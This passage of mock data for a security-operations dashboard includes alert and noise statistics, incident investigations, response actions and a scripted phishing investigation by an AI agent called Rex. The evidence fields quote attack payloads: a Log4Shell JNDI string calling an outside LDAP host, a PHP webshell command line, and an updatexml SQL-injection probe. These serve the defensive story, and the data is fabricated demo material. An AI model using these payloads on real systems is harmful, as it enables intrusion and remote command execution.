      { cluster: 'cluster-1842', title: 'SQL 注入探测', duplicates: 312, source: '45.83.**.21', target: 'api.pay.example.com', pattern: '/v1/user?id=*', firstSeen: '09:12', lastSeen: '14:38' },
      { cluster: 'cluster-2017', title: '后台登录探测', duplicates: 226, source: '多源', target: 'login.shop.example.com', pattern: '/admin*', firstSeen: '10:03', lastSeen: '16:21' },
      { cluster: 'cluster-2216', title: '配置文件探测', duplicates: 144, source: '198.235.**.44', target: 'api.pay.example.com', pattern: '/config*', firstSeen: '11:20', lastSeen: '17:06' },
    ],
  },
  conditionReport: [
    { processType: 'alert_scan_direction_in', count: 2184, explanation: '入站扫描' },
    { processType: 'alert_scan_direction_out', count: 346, explanation: '出站扫描' },
    { processType: 'alert_scan_direction_lateral', count: 898, explanation: '内部横向扫描' },
    { processType: 'alert_not_scan_not_http_direction_in', count: 712, explanation: '非 HTTP 入站告警' },
    { processType: 'alert_not_process', count: 412, explanation: '字段不足或暂不处理' },
  ],
  ruleReport: [
    { id: 'WAF-LOW-001', name: '通用爬虫访问', removed: 264, updatedAt: '2026-06-10', note: '已确认多为搜索引擎' },
    { id: 'NDR-INFO-203', name: 'HTTP 目录枚举', removed: 211, updatedAt: '2026-06-08', note: '未命中敏感路径时压制' },
    { id: 'EDR-WARN-019', name: '运维脚本访问', removed: 153, updatedAt: '2026-06-01', note: '绑定资产标签后压制' },
  ],
  listReport: {
    allow: [
      { object: '10.10.5.23', type: '内部漏扫器', removed: 412, ttl: '长期', note: '授权扫描平台' },
      { object: '66.249.0.0/16', type: '搜索引擎', removed: 118, ttl: '长期', note: 'Googlebot' },
      { object: '220.181.0.0/16', type: '搜索引擎', removed: 106, ttl: '长期', note: 'Baiduspider' },
    ],
    deny: [
      { object: '45.83.**.21', type: '黑灰产 IP', hits: 126, action: '聚合为情报事件', note: '多次探测登录口' },
      { object: 'malicious-ua-x', type: '恶意 UA', hits: 41, action: '转入研判', note: '命中 PoC 扫描' },
    ],
  },
};

export const assetRows = [
  { name: sharedStory.asset, type: 'WAF', region: sharedStory.region, access: 'API + web2cli', risk: '高', status: '已接入' },
  { name: 'FW-HZ-DMZ-01', type: '防火墙', region: sharedStory.region, access: 'API', risk: '中', status: '待绑定巡检' },
  { name: 'NDR-HZ-CORE-01', type: 'NDR', region: '华东一区 / 核心区', access: 'MCP', risk: '低', status: '已接入' },
  { name: 'EDR-MGMT-01', type: 'EDR 管理端', region: '总部 / 管理区', access: 'API', risk: '中', status: '凭证待验证' },
];

export const dataCenterAssets = [
  {
    id: 'beijing',
    name: '北京机房',
    summary: '边界区 / 办公网 / 服务器区',
    devices: [
      { type: 'TDP', name: 'BJ-TDP-01', cpu: 42, memory: 61, disk: 55, alerts: 9836, license: '2026-11-30', intel: 'TDP 情报正常', status: '健康' },
      { type: 'NDR', name: 'BJ-NDR-CORE-01', cpu: 37, memory: 58, disk: 44, alerts: 421, license: '2026-09-18', intel: 'IOC 更新 5分钟前', status: '健康' },
      { type: 'NDR', name: 'BJ-NDR-DMZ-02', cpu: 69, memory: 72, disk: 63, alerts: 812, license: '2026-08-02', intel: 'IOC 更新 12分钟前', status: '关注' },
      { type: 'HIDS', name: 'BJ-HIDS-CLUSTER', cpu: 31, memory: 49, disk: 51, alerts: 188, license: '2027-01-12', intel: '基线库正常', status: '健康' },
      { type: 'EDR', name: 'BJ-EDR-MGMT-01', cpu: 56, memory: 66, disk: 58, alerts: 274, license: '2026-06-30', intel: '样本库正常', status: '健康' },
      { type: 'WAF', name: 'BJ-WAF-DMZ-01', cpu: 63, memory: 70, disk: 47, alerts: 1023, license: '2026-07-15', intel: '规则库正常', status: '关注' },
      { type: '邮件网关', name: 'BJ-MAIL-GW-01', cpu: 28, memory: 52, disk: 61, alerts: 43, license: '2026-12-01', intel: 'URL 情报正常', status: '健康' },
      { type: '防火墙', name: 'BJ-FW-EDGE-01', cpu: 33, memory: 45, disk: 39, alerts: 96, license: '2026-10-20', intel: '不适用', status: '健康' },
    ],
  },
  {
    id: 'hangzhou',
    name: '杭州机房',
    summary: 'DMZ / 核心区 / 支付业务区',
    devices: [
      { type: 'NDR', name: 'NDR-HZ-CORE-01', cpu: 48, memory: 64, disk: 52, alerts: 326, license: '2026-09-01', intel: 'IOC 更新 3分钟前', status: '健康' },
      { type: 'NDR', name: 'NDR-HZ-DMZ-02', cpu: 76, memory: 81, disk: 68, alerts: 694, license: '2026-05-29', intel: 'IOC 更新 8分钟前', status: '关注' },
      { type: 'WAF', name: 'DMZ-WAF-02', cpu: 71, memory: 73, disk: 59, alerts: 126, license: '2026-06-10', intel: '规则库正常', status: '关注' },
      { type: '防火墙', name: 'FW-HZ-DMZ-01', cpu: 39, memory: 57, disk: 41, alerts: 58, license: '2027-02-01', intel: '不适用', status: '健康' },
      { type: 'HIDS', name: 'HZ-HIDS-PAY-CLUSTER', cpu: 44, memory: 60, disk: 66, alerts: 207, license: '2026-12-20', intel: '基线库正常', status: '健康' },
      { type: 'EDR', name: 'HZ-EDR-MGMT-01', cpu: 52, memory: 67, disk: 49, alerts: 133, license: '2026-07-02', intel: '样本库正常', status: '健康' },
      { type: 'TDP', name: 'HZ-TDP-01', cpu: null, memory: null, disk: null, alerts: 0, license: '未接入', intel: '缺失', status: '缺失' },
      { type: '邮件网关', name: 'HZ-MAIL-GW-01', cpu: 30, memory: 50, disk: 43, alerts: 12, license: '2026-10-01', intel: 'URL 情报正常', status: '健康' },
    ],
  },
  {
    id: 'shanghai',
    name: '上海机房',
    summary: '电商业务 / 外联区 / 办公网',
    devices: [
      { type: 'TDP', name: 'SH-TDP-01', cpu: 58, memory: 69, disk: 62, alerts: 2361, license: '2026-08-18', intel: 'TDP 情报正常', status: '健康' },
      { type: 'NDR', name: 'SH-NDR-CORE-01', cpu: 62, memory: 74, disk: 58, alerts: 503, license: '2026-04-20', intel: 'IOC 更新 16分钟前', status: '关注' },
      { type: 'NDR', name: 'SH-NDR-IDC-02', cpu: 41, memory: 55, disk: 46, alerts: 221, license: '2026-11-11', intel: 'IOC 更新 10分钟前', status: '健康' },
      { type: 'WAF', name: 'SH-WAF-DMZ-01', cpu: 66, memory: 75, disk: 60, alerts: 884, license: '2026-09-09', intel: '规则库正常', status: '健康' },
      { type: 'HIDS', name: 'SH-HIDS-CLUSTER', cpu: 35, memory: 53, disk: 57, alerts: 144, license: '2026-12-31', intel: '基线库正常', status: '健康' },
      { type: 'EDR', name: 'SH-EDR-MGMT-01', cpu: 49, memory: 63, disk: 54, alerts: 89, license: '2026-08-30', intel: '样本库正常', status: '健康' },
      { type: '邮件网关', name: 'SH-MAIL-GW-01', cpu: null, memory: null, disk: null, alerts: 0, license: '未部署', intel: '缺失', status: '缺失' },
      { type: '防火墙', name: 'SH-FW-EDGE-01', cpu: 45, memory: 51, disk: 40, alerts: 73, license: '2027-03-15', intel: '不适用', status: '健康' },
    ],
  },
];

export const vulnerabilityRows = [
  { cve: sharedStory.cve, product: '边界 WAF 管理组件', assets: '3 台', confidence: '高', action: '授权验证' },
  { cve: 'CVE-2026-17720', product: 'VPN 网关', assets: '12 台', confidence: '中', action: '补全版本' },
  { cve: 'CVE-2025-49113', product: '邮件网关', assets: '2 台', confidence: '低', action: '人工确认' },
];

export const drillStats = [
  { label: '目标人员', value: '420', hint: '财务、采购、销售三类人群' },
  { label: '预计投递', value: '明日 10:00', hint: '避开月底结算窗口' },
  { label: '审批状态', value: '已通过', hint: '合规、HR、业务负责人已确认' },
  { label: '复盘产出', value: '4 份', hint: '团队报告、个人反馈、课程建议、管理摘要' },
];

export const intelBriefings = [
  { title: sharedStory.intelTopic, source: '微步 MCP', relevance: '高', action: `排查 ${sharedStory.cve} 影响资产` },
  { title: '供应链邮件投递活动升温', source: '行业情报', relevance: '中', action: '更新钓鱼演练素材' },
  { title: '云上 Redis 暴露扫描增加', source: 'OSINT', relevance: '中', action: '触发攻击面巡航' },
  { title: '勒索团伙利用弱口令 VPN 入侵', source: '威胁报告', relevance: '低', action: '检查 VPN 登录基线' },
];

export const investigationPlan = [
  { agent: '情报查询 Agent', status: '已完成', summary: `${sharedStory.attackerIp} 命中漏洞利用基础设施标签，可信度 92%。` },
  { agent: '资产上下文 Agent', status: '已完成', summary: `${sharedStory.asset} 位于 DMZ，承载支付回调入口。` },
  { agent: '日志检索 Agent', status: '运行中', summary: '正在拉取 WAF、NDR、主机审计三类日志做时间线对齐。' },
  { agent: '报告 Agent', status: '等待中', summary: '等待深度调查完成后生成值班摘要和工单描述。' },
];

export const deepInvestigations = [
  {
    id: 'INV-2026-0614-001',
    title: 'WordPress SQL 注入成功后数据库暴露排查',
    severity: 'P1',
    status: '调查中',
    owner: '应用安全组',
    entities: ['NDR', 'WAF', '应用日志', '数据库审计', 'CMDB'],
    summary: '承接 NDR-2026-0614-001，围绕 SQL 注入成功证据、目标资产组件版本、数据库错误回显和后续数据库访问进行多维度调查。',
    evidence: [
      { source: 'NDR', time: '09:44', detail: 'POST /admin/dict/ 命中 updatexml 报错注入 payload，响应体回显 XPATH syntax error 与 root@localhost。' },
      { source: 'WAF', time: '09:44', detail: '同源 106.12.35.52 对 WordPress 站点连续投递 7 次 SQLi payload，其中 2 次返回 200。' },
      { source: '应用日志', time: '09:45', detail: 'WordPress 插件 develop 相关接口记录到 query_vars 参数异常，后端未屏蔽 SQL 错误详情。' },
      { source: '数据库审计', time: '09:46', detail: 'MySQL 审计出现包含 updatexml 与 user() 的异常查询，未发现后续 dump、union select 或批量读取行为。' },
      { source: 'CMDB', time: '09:48', detail: '目标 124.222.108.178 为公网 WordPress 站点，版本和插件信息匹配 CVE-2022-21661 影响范围。' },
    ],
    recommendation: '立即封禁 106.12.35.52 及同 C 段可疑 IP，升级 WordPress 和受影响插件，关闭 SQL 错误回显，并复核数据库账号权限。',
  },
  {
    id: 'INV-2026-0522-001',
    title: '财务实习生点击钓鱼链接后疑似凭证外泄',
    severity: 'P1',
    status: '调查中',
    owner: '终端安全组',
    entities: ['NDR', 'EDR', '邮件网关', 'OA'],
    summary: 'NDR 发现访问钓鱼链接，EDR 记录用户点击邮件链接，邮件网关命中可疑投递，OA 显示该用户为财务实习生。',
    evidence: [
      { source: 'NDR', time: '10:14', detail: '检测到终端 10.12.8.45 访问 hxxps://invoice-check.example/login，域名命中钓鱼情报。' },
      { source: 'EDR', time: '10:13', detail: '用户 li.yan 打开邮件附件并点击外部链接，浏览器进程由 outlook.exe 拉起。' },
      { source: '邮件网关', time: '10:11', detail: '拦截同主题邮件 27 封，其中 1 封投递成功，发件人伪装为供应商对账。' },
      { source: 'OA', time: '10:10', detail: 'li.yan 为财务实习生，入职 12 天，拥有报销系统只读权限。' },
    ],
    recommendation: '临时冻结账号外部访问，重置密码，检索同主题邮件收件人并发起二次确认。',
  },
  {
    id: 'INV-2026-0614-003',
    title: 'Log4Shell JNDI 回连与 Java 主机利用排查',
    severity: 'P1',
    status: '已升级',
    owner: '电商业务安全组',
    entities: ['NDR', 'WAF', 'SBOM', 'HIDS'],
    summary: '承接 NDR-2026-0614-003，围绕 JNDI payload、LDAP 出站回连、Log4j 组件版本和主机落地痕迹进行调查。',
    evidence: [
      { source: 'NDR', time: '11:22', detail: 'shop-api.example.com 收到 ${jndi:ldap://45.83.12.21:1389/Exploit} 后，4 秒内向 45.83.12.21:1389 发起 LDAP 连接。' },
      { source: 'WAF', time: '11:22', detail: '同源 IP 在 12 分钟内对 4 个 Java API 投递 JNDI payload，shop-api.example.com 为唯一出现回连的资产。' },
      { source: 'SBOM', time: '11:24', detail: '目标应用依赖 log4j-core-2.14.1.jar，处于 CVE-2021-44228 影响范围。' },
      { source: 'HIDS', time: '11:26', detail: 'Java 进程未拉起 sh/bash/curl 子进程，暂未观察到二阶段命令执行。' },
      { source: 'HIDS', time: '11:28', detail: '/tmp 与应用目录未发现 Exploit.class 或新增脚本文件，但应用日志出现 JndiLookup 解析异常。' },
    ],
    recommendation: '立即限制目标应用出网，升级 Log4j 组件，保全 JVM、应用日志和网络连接记录，并对同版本 Java 应用执行横向排查。',
  },
  {
    id: 'INV-2026-0614-004',
    title: 'WebShell 远控命令执行与主机失陷排查',
    severity: 'P1',
    status: '调查中',
    owner: '内容平台安全组',
    entities: ['NDR', 'HIDS', 'WAF', 'CMDB'],
    summary: '承接 NDR-2026-0614-005，围绕 WebShell 参数化命令执行、系统用户回显、二阶段下载和主机持久化痕迹进行调查。',
    evidence: [
      { source: 'NDR', time: '13:05', detail: '185.220.101.47 访问 cms.example.com 的 WebShell 参数化接口，响应体回显 uid=33(www-data) 和 hostname。' },
      { source: 'HIDS', time: '13:06', detail: 'w3wp/php-fpm 子进程链路出现 whoami、id、curl 三类命令，随后访问外部脚本下载地址。' },
      { source: 'HIDS', time: '13:07', detail: 'Web 根目录发现 recent.jsp 与 image.jsp 两个新增脚本文件，mtime 与 NDR 告警窗口一致。' },
      { source: 'WAF', time: '13:08', detail: '过去 24 小时同源 IP 对 /uploads、/plugins、/template 路径进行 19 次探测。' },
      { source: 'CMDB', time: '13:10', detail: 'cms.example.com 承载内容管理平台，上传目录历史巡检曾提示脚本执行权限配置不当。' },
    ],
    recommendation: '隔离 cms.example.com，封禁控制端 IP，保全 WebShell 样本、进程树和网络连接，并排查同目录下其他可疑脚本。',
  },
  {
    id: 'INV-2026-0614-005',
    title: '文件上传接口 WebShell 投递与落盘确认',
    severity: 'P2',
    status: '待确认',
    owner: '内容平台安全组',
    entities: ['NDR', 'WAF', '应用日志', 'HIDS'],
    summary: '承接 NDR-2026-0614-006，围绕上传接口返回成功、可疑 PHP 内容、文件落盘路径和后续访问行为进行调查。',
    evidence: [
      { source: 'NDR', time: '14:31', detail: 'POST /api/upload 的 multipart 内容包含 shell.php 与 system($_GET["cmd"])，响应返回 upload success。' },
      { source: 'WAF', time: '14:31', detail: '请求体命中 WebShell 上传特征，但当前策略处于观察模式，未阻断该请求。' },
      { source: '应用日志', time: '14:32', detail: '上传服务记录生成 /uploads/2026/06/shell.php，返回可访问 URL 字段。' },
      { source: 'HIDS', time: '14:33', detail: '文件系统暂未扫描到 shell.php 落盘，疑似被异步安全任务删除或存储在对象存储；未发现 Web 进程执行 shell.php 后续命令，需继续观察是否存在访问 /uploads/2026/06/shell.php?cmd= 的请求。' },
    ],
    recommendation: '封禁源 IP，确认上传文件实际存储位置，关闭上传目录脚本执行权限，将 WAF 观察规则切换为阻断并复测上传链路。',
  },
];

export const responseActions = [
  {
    id: 'ACT-2026-0614-001',
    source: '告警研判 / NDR-2026-0614-001',
    priority: 'P1',
    object: '106.12.35.52',
    action: '封禁源 IP 及同 C 段可疑地址',
    evidence: 'SQL 注入响应回显 root@localhost，源 IP 命中恶意情报',
    owner: '边界安全组',
    status: '待执行',
  },
  {
    id: 'ACT-2026-0614-002',
    source: '告警研判 / NDR-2026-0614-001',
    priority: 'P1',
    object: '124.222.108.178 / WordPress',
    action: '升级 WordPress 和受影响插件',
    evidence: 'CMDB 与插件信息匹配 CVE-2022-21661 影响范围',
    owner: '应用安全组',
    status: '处理中',
  },
  {
    id: 'ACT-2026-0614-003',
    source: '告警研判 / NDR-2026-0614-001',
    priority: 'P2',
    object: 'WordPress 站点数据库连接',
    action: '关闭 SQL 错误回显并复核数据库账号权限',
    evidence: '响应体暴露 XPATH syntax error 与数据库用户名',
    owner: '应用安全组',
    status: '待确认',
  },
  {
    id: 'ACT-2026-0614-004',
    source: '告警研判 / NDR-2026-0614-002',
    priority: 'P1',
    object: 'li.yan',
    action: '临时冻结账号外部访问并重置密码',
    evidence: '终端访问钓鱼登录页，页面为凭证采集表单',
    owner: '账号安全组',
    status: '待执行',
  },
  {
    id: 'ACT-2026-0614-005',
    source: '深度调查 / INV-2026-0522-001',
    priority: 'P2',
    object: '供应商对账主题邮件',
    action: '检索同主题收件人并发起二次确认',
    evidence: '邮件网关拦截 27 封，其中 1 封投递成功',
    owner: '终端安全组',
    status: '处理中',
  },
  {
    id: 'ACT-2026-0614-006',
    source: '告警研判 / NDR-2026-0614-003',
    priority: 'P1',
    object: 'shop-api.example.com',
    action: '限制目标应用出网访问',
    evidence: 'JNDI payload 后 4 秒内向外部 LDAP 服务回连',
    owner: '电商业务安全组',
    status: '待执行',
  },
  {
    id: 'ACT-2026-0614-007',
    source: '深度调查 / INV-2026-0614-003',
    priority: 'P1',
    object: 'log4j-core-2.14.1.jar',
    action: '升级 Log4j 组件并横向排查同版本 Java 应用',
    evidence: 'SBOM 命中 CVE-2021-44228 影响版本',
    owner: '电商业务安全组',
    status: '处理中',
  },
  {
    id: 'ACT-2026-0614-008',
    source: '深度调查 / INV-2026-0614-003',
    priority: 'P2',
    object: 'shop-api JVM / 应用日志',
    action: '保全 JVM、应用日志和网络连接记录',
    evidence: '应用日志出现 JndiLookup 解析异常',
    owner: '电商业务安全组',
    status: '待确认',
  },
  {
    id: 'ACT-2026-0614-009',
    source: '告警研判 / NDR-2026-0614-005',
    priority: 'P1',
    object: 'cms.example.com',
    action: '隔离受害主机',
    evidence: 'WebShell 接口回显 uid=33(www-data) 和 hostname',
    owner: '内容平台安全组',
    status: '待执行',
  },
  {
    id: 'ACT-2026-0614-010',
    source: '深度调查 / INV-2026-0614-004',
    priority: 'P1',
    object: '185.220.101.47',
    action: '封禁控制端 IP',
    evidence: 'Tor 出口节点访问 WebShell 参数化接口并触发二阶段下载',
    owner: '边界安全组',
    status: '待执行',
  },
  {
    id: 'ACT-2026-0614-011',
    source: '深度调查 / INV-2026-0614-004',
    priority: 'P1',
    object: 'cms.example.com Web 根目录',
    action: '保全 WebShell 样本、进程树和网络连接',
    evidence: 'HIDS 发现 recent.jsp 与 image.jsp，mtime 与告警窗口一致',
    owner: '内容平台安全组',
    status: '处理中',
  },
  {
    id: 'ACT-2026-0614-012',
    source: '深度调查 / INV-2026-0614-004',
    priority: 'P2',
    object: 'cms.example.com 上传目录',
    action: '排查同目录其他可疑脚本',
    evidence: '历史巡检提示上传目录脚本执行权限配置不当',
    owner: '内容平台安全组',
    status: '待确认',
  },
  {
    id: 'ACT-2026-0614-013',
    source: '告警研判 / NDR-2026-0614-006',
    priority: 'P1',
    object: '193.36.119.42',
    action: '加入 FW 阻断',
    evidence: 'WebShell 投递请求返回 upload success',
    owner: '边界安全组',
    status: '待执行',
  },
  {
    id: 'ACT-2026-0614-014',
    source: '深度调查 / INV-2026-0614-005',
    priority: 'P1',
    object: '/uploads/2026/06/shell.php',
    action: '确认上传文件实际存储位置并删除可疑文件',
    evidence: '应用日志记录生成 shell.php 并返回可访问 URL 字段',
    owner: '内容平台安全组',
    status: '待确认',
  },
  {
    id: 'ACT-2026-0614-015',
    source: '深度调查 / INV-2026-0614-005',
    priority: 'P1',
    object: '上传目录执行策略',
    action: '关闭上传目录脚本执行权限',
    evidence: 'multipart 内容包含 system($_GET["cmd"])',
    owner: '内容平台安全组',
    status: '待执行',
  },
  {
    id: 'ACT-2026-0614-016',
    source: '深度调查 / INV-2026-0614-005',
    priority: 'P2',
    object: 'WAF WebShell 上传规则',
    action: '将 WAF 观察规则切换为阻断并复测上传链路',
    evidence: 'WAF 命中特征但策略处于观察模式',
    owner: 'WAF 运营组',
    status: '处理中',
  },
  {
    id: 'ACT-2026-0614-017',
    source: '降噪分析 / 扫描源清单',
    priority: 'P2',
    object: '45.83.12.21',
    action: '加入临时封禁 7 天',
    evidence: '126 条扫描告警，37 次 200，12 次敏感命中',
    owner: '边界安全组',
    status: '待执行',
  },
  {
    id: 'ACT-2026-0614-018',
    source: '降噪分析 / 扫描源清单',
    priority: 'P2',
    object: '10.12.8.66',
    action: '临时隔离并转入研判',
    evidence: '未登记主机横向扫描 33 台资产，44 次 200',
    owner: '终端安全组',
    status: '待执行',
  },
  {
    id: 'ACT-2026-0614-019',
    source: '降噪分析 / 200 响应资产',
    priority: 'P2',
    object: 'admin.crm.example.com',
    action: '限制管理后台仅 VPN 或办公出口访问',
    evidence: '/admin、/admin/user、/admin/export 返回 200',
    owner: '应用安全组',
    status: '待确认',
  },
  {
    id: 'ACT-2026-0614-020',
    source: '降噪分析 / 200 响应资产',
    priority: 'P2',
    object: 'api.pay.example.com',
    action: '关闭公网 Swagger 和 actuator 暴露',
    evidence: '/swagger-ui、/actuator/health、/v1/status 返回 200',
    owner: '支付业务安全组',
    status: '处理中',
  },
];

export const agentInvestigationMessages = [
  {
    role: 'user',
    sender: '值班分析员',
    time: '10:15',
    content: '请调查财务实习生 li.yan 是否点击了钓鱼链接，并判断是否存在凭证外泄风险。',
  },
  {
    role: 'assistant',
    sender: 'Rex',
    time: '10:15',
    content: '先从网络侧确认是否真的访问了钓鱼站点。我会启动 NDR 调查 Agent 查询相关网络会话。',
  },
  {
    role: 'delegate',
    sender: 'Rex',
    time: '10:16',
    content: '启动 NDR 调查 Agent，确认终端是否访问钓鱼站点。',
    delegate: {
      title: 'NDR 调查 Agent',
      description: '网络侧访问链路和威胁情报命中分析',
      status: 'completed',
      elapsed: '42s',
      steps: 3,
    },
  },
  {
    role: 'tool',
    sender: 'NDR 调查 Agent',
    time: '10:16',
    content: '第一次按用户检索 NDR 会话没有结果，因为 NDR 只记录 IP。切换为从 EDR 获取的终端 IP 10.12.8.45 后，发现访问 hxxps://invoice-check.example/login。',
    toolCalls: [
      { name: 'ndr.search_by_user', target: 'li.yan', status: 'failed', result: 'NDR 不支持按用户名检索，需先解析终端 IP。' },
      { name: 'edr.resolve_user_endpoint', target: 'li.yan', status: 'success', result: '解析到终端 10.12.8.45 / hostname FIN-INTERN-07。' },
      { name: 'ndr.query_http_sessions', target: '10.12.8.45', status: 'success', result: '10:14 访问 hxxps://invoice-check.example/login，域名命中钓鱼情报。' },
    ],
    conclusion: 'NDR 侧确认该终端确实访问了钓鱼登录页，但无法证明是谁点击，需要继续从终端侧回溯用户行为。',
  },
  {
    role: 'assistant',
    sender: 'Rex',
    time: '10:16',
    content: 'NDR 不能直接按用户名检索，但现在拿到了终端 IP 和可疑访问记录。下一步需要从终端侧回溯是谁点击了链接，以及是否有文件落地。',
  },
  {
    role: 'delegate',
    sender: 'Rex',
    time: '10:17',
    content: '启动 EDR 调查 Agent，回溯终端进程树、浏览器访问和文件落地。',
    delegate: {
      title: 'EDR 调查 Agent',
      description: '终端行为、进程树和浏览器访问取证',
      status: 'completed',
      elapsed: '55s',
      steps: 3,
    },
  },
  {
    role: 'tool',
    sender: 'EDR 调查 Agent',
    time: '10:17',
    content: 'EDR 先检索文件落地未命中，再追踪进程树，确认 outlook.exe 拉起浏览器访问外部链接。未发现落地恶意文件。',
    toolCalls: [
      { name: 'edr.search_file_events', target: 'FIN-INTERN-07', status: 'success', result: '未发现可疑附件落地或执行。' },
      { name: 'edr.query_process_tree', target: 'FIN-INTERN-07', status: 'success', result: 'outlook.exe -> msedge.exe，命令行包含 invoice-check.example。' },
      { name: 'edr.collect_browser_history', target: 'li.yan', status: 'success', result: '10:14 打开钓鱼登录页，未发现后续下载行为。' },
    ],
    conclusion: 'EDR 侧确认 li.yan 通过 Outlook 邮件点击链接访问了钓鱼页面，暂未发现恶意文件落地或执行。',
  },
  {
    role: 'assistant',
    sender: 'Rex',
    time: '10:17',
    content: 'EDR 证实 outlook.exe 拉起浏览器访问外部链接。为了确认邮件投递范围和是否还有其他收件人，需要启动邮件网关 Agent。',
  },
  {
    role: 'delegate',
    sender: 'Rex',
    time: '10:18',
    content: '启动邮件网关 Agent，确认可疑邮件投递范围和是否存在绕过。',
    delegate: {
      title: '邮件网关 Agent',
      description: '邮件投递、短链接展开和同主题活动聚合',
      status: 'completed',
      elapsed: '1m12s',
      steps: 3,
    },
  },
  {
    role: 'tool',
    sender: '邮件网关 Agent',
    time: '10:18',
    content: '邮件网关按 IOC 没查到投递记录，改用主题和短链接特征扩大搜索，发现同主题邮件 27 封，其中 1 封投递成功。',
    toolCalls: [
      { name: 'mailgw.search_by_ioc', target: 'invoice-check.example', status: 'failed', result: '邮件正文使用短链接，原始域名未直接出现。' },
      { name: 'mailgw.expand_short_url', target: 't.ly/fp-verify', status: 'success', result: '短链接跳转到 hxxps://invoice-check.example/login。' },
      { name: 'mailgw.search_campaign', target: '供应商对账 / 发票确认', status: 'success', result: '发现 27 封同主题邮件，26 封拦截，1 封投递给 li.yan。' },
    ],
    conclusion: '邮件网关确认这是一次供应商对账主题钓鱼投递活动，大部分邮件已拦截，但 li.yan 收到并点击了其中一封。',
  },
  {
    role: 'assistant',
    sender: 'Rex',
    time: '10:18',
    content: '邮件网关确认 1 封投递成功。现在需要判断该用户的岗位、权限和潜在业务影响，所以继续查询 OA 与权限系统上下文。',
  },
  {
    role: 'delegate',
    sender: 'Rex',
    time: '10:19',
    content: '启动 OA 上下文 Agent，补全用户身份、岗位和业务权限。',
    delegate: {
      title: 'OA 上下文 Agent',
      description: '用户身份、组织关系和业务权限上下文',
      status: 'completed',
      elapsed: '31s',
      steps: 3,
    },
  },
  {
    role: 'tool',
    sender: 'OA 上下文 Agent',
    time: '10:19',
    content: 'OA 与权限系统确认 li.yan 为财务实习生，入职 12 天，仅有报销系统只读权限，无付款审批权限。',
    toolCalls: [
      { name: 'oa.get_user_profile', target: 'li.yan', status: 'success', result: '财务实习生，入职 12 天，直属导师 wang.min。' },
      { name: 'iam.list_business_permissions', target: 'li.yan', status: 'success', result: '报销系统只读权限，无付款审批权限。' },
      { name: 'oa.lookup_manager', target: 'li.yan', status: 'success', result: '建议通知导师 wang.min 和财务安全接口人。' },
    ],
    conclusion: 'OA 与权限系统确认该用户业务权限较低，凭证外泄影响主要集中在报销系统只读数据和后续横向钓鱼风险。',
  },
  {
    role: 'assistant',
    sender: 'Rex',
    time: '10:20',
    content: '多源证据形成闭环：邮件投递成功 -> 用户点击链接 -> NDR 访问钓鱼站点 -> OA 确认为低权限财务实习生。建议冻结外部访问、重置密码、检索同主题邮件收件人，并生成处置工单。',
  },
];

export const exposureFindings = [
  { title: '新增公网服务', detail: '发现 test-pay.example.com 暴露 8443 端口，未归属到 CMDB。' },
  { title: '证书即将过期', detail: 'api.example.com 证书 9 天后过期，建议自动创建提醒任务。' },
  { title: '影子资产认领', detail: '2 个子域名解析到云厂商临时 IP，Rex 建议关联业务 owner。' },
];

export const intelCards = [
  { title: sharedStory.intelTopic, detail: `微步 MCP 建议优先排查 ${sharedStory.cve} 与边界 WAF 资产。`, icon: Radar },
  { title: '供应链投递活动升温', detail: '财务主题附件在同业企业出现，建议同步钓鱼演练素材。', icon: MailWarning },
  { title: '边界暴露资产变化', detail: 'FOFA/证书源发现 3 个新增公网入口，建议进入攻击面巡航。', icon: Shield },
];
